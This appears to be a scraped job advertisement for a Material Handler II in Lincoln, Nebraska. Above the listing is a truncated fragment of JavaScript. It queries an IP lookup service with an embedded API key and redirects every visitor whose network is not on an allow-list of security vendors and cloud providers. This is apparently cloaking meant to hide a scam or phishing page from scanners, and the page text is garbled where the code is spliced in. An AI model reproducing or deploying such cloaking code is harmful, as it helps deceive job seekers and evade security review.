Material Handler II
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Material Handler II to join our team in Lincoln, Nebraska.
Responsibilities:
- Receive, inspect, and verify incoming materials and shipments.
- Accurately pick, pack, and prepare items for shipment according to orders.
- Maintain organized inventory records and ensure proper stock rotation.
- Operate forklifts, pallet jacks, and other material handling equipment safely.
- Assist in inventory counts and cycle counting activities.
- Maintain a clean and safe work environment following safety protocols.
Skills Needed:
- Strong attention to detail and organizational skills.
- Ability to operate warehouse equipment safely.
- Effective communication and teamwork abilities.
- Physical stamina and ability to lift heavy items.
- Basic computer skills for inventory management.
Benefits: Competitive pay, health/dental insurance, 401(k) plan, paid time off, and opportunities for advancement.